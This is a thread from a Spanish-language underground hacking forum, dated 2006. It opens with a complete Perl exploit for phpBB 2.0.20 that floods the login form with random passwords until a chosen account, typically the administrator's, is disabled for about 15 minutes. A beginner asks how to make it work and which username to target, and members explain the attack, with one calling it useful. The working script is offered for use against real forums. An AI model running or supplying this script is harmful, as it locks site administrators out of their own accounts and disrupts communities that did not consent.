Normas del foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Noviembre 18, 2008, 05:19:06
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderadores: OzX, y0u-uNsEcUre)  |  Tema: Send Packet 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Send Packet  (Leído 340 veces)
Chivaman
Visitante
« en: Diciembre 17, 2006, 10:53:14 »
Código:
###################################################################################
#!/usr/bin/perl
# For PHPBB 2.0.20
# This Exploit Disable Admin Or other User IN PHPBB Forums For 15 Min
# Discover & Writ By : Hossein-Asgari
# http://simorgh-ev.com
# Comment : PHPBB 2.0.18 Secured Bruteforce Cracking Password !
# BUT :
# If anybody Bruteforce TO ADMIN Account --> Admin Account Is Disable .
# Enjoy !
# Advisory : http://www.simorgh-ev.com/advisory/2006/phpbb-disable-admin.pl.txt
###################################################################################
$host=$ARGV[0];
$dirc=$ARGV[1];
$port=$ARGV[2];
$user=$ARGV[3];

$dirsend = "$dirc" . "login.php";
print "
   -------------------------------------
   phpbb-Disable-user.php <Host> </Dir/> <Port> <Admin Username >
   --------------------------------------
   ";
$i=1;
if ($host ne ""){
while($OK ne 1){


use IO::Socket;
my($socket) ="";
   if ($socket = IO::Socket::INET->new(PeerAddr => $host ,
                                       PeerPort => $port ,
                                       Proto    => "TCP"))
{


$password=rand();
$data  = "username="."$user"."&password="."$password"."&redirect=&login=Connexion
";
$length = length $data;
print $socket "POST $dirsend HTTP/1.1
Host: $host
Content-Type: application/x-www-form-urlencoded
Content-Length: $length

$data";
read  $socket, $answer, 15;
close($socket);
}
if($answer =~ /HTTP\/(.*?) 302/){$OK = 1;}
$i=$i+"1";
print "$answer
";
print "Send Packet $i ....
" ;

}}


Hola, ya hice todo eso pero cuando presiono enter (despues de cargar el "xploit.pl" en el CMD me dice "Send packet 1" y asi , me canse de esperar ya hiba en "Send packet 358 545" y cerre el CMD, que pasa con eso, tengo que hacer algo mas??



Saludos


EDIT: Ya hice una busqueda y no encontre nada ni aqui ni en google..   Undecided
« Última modificación: Diciembre 17, 2006, 10:54:45 por Chivaman » En línea
OzX
Moderadores
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 2144


http://foro.undersecurity.net


Ver Perfil WWW
« Respuesta #1 en: Diciembre 17, 2006, 04:37:33 »
En línea

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Chivaman
Visitante
« Respuesta #2 en: Diciembre 17, 2006, 04:44:57 »
En línea
Chivaman
Visitante
« Respuesta #3 en: Diciembre 17, 2006, 05:54:41 »
ahora trato de hacer un ataque y me dice:

phpbb-Disable-user.php <la url > </foros/> <80> <administrador> (<-- aqui el nick o el ID?)


EDIT: puse mal los datos?
« Última modificación: Diciembre 17, 2006, 06:02:23 por Chivaman » En línea
OzX
Moderadores
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 2144


http://foro.undersecurity.net


Ver Perfil WWW
« Respuesta #4 en: Diciembre 17, 2006, 06:14:29 »
sabes lo que es brute forcE? no ejecutes nunca un exploit si no sabes lo que hace.
En línea

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Chivaman
Visitante
« Respuesta #5 en: Diciembre 17, 2006, 06:27:49 »
explicame y lo sabre, acabo de empezar en esto!


Perdon si hice algo mal! Tongue
En línea
Litlehorse
Miembro
*****
Desconectado Desconectado

Mensajes: 22


Ver Perfil WWW
« Respuesta #6 en: Diciembre 17, 2006, 06:36:04 »
Citar
#
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
# Comment : PHPBB 2.0.18 Secured Bruteforce Cracking Password !
# BUT :
# If anybody Bruteforce TO ADMIN Account --> Admin Account Is Disable .


Ese exploit si no me equivoco lo que hace es: Enviar paquetes constantes de intentos de logueo en la cuenta que le indiques y de esta forma por un bug consigue deshabilitar la cuenta de administrador por aproximadamente 10 minutos.
En línea

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
My blog*
Pr0gr4mer
Colaborador
*****
Desconectado Desconectado

Mensajes: 865


Pr0gr4mer al mango


Ver Perfil WWW
« Respuesta #7 en: Diciembre 18, 2006, 09:23:15 »
Cita de: Chivaman en Diciembre 17, 2006, 06:27:49
explicame y lo sabre, acabo de empezar en esto!


Perdon si hice algo mal! Tongue

 Alli esta el problema! quieres arrancar con una ferrari y ni siquiera sabes manejar una motito a bateria.
 Primero empiesa con la teoria y despues dale a la practica...

 Pr0gr4mer
En línea



 Tu respuesta esta dandole click al
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
San Buscador


 .::Pr0gr4mer::.
WiNsMuRf
Colaborador
*****
Desconectado Desconectado

Mensajes: 858


Tux Rlz!


Ver Perfil WWW
« Respuesta #8 en: Diciembre 25, 2006, 12:26:29 »
lindo y util exploit

Saludos
En línea





No respondo mensajes privados ni atiendo en el messenger..
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderadores: OzX, y0u-uNsEcUre)  |  Tema: Send Packet « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.7 | SMF © 2006-2007, Simple Machines LLC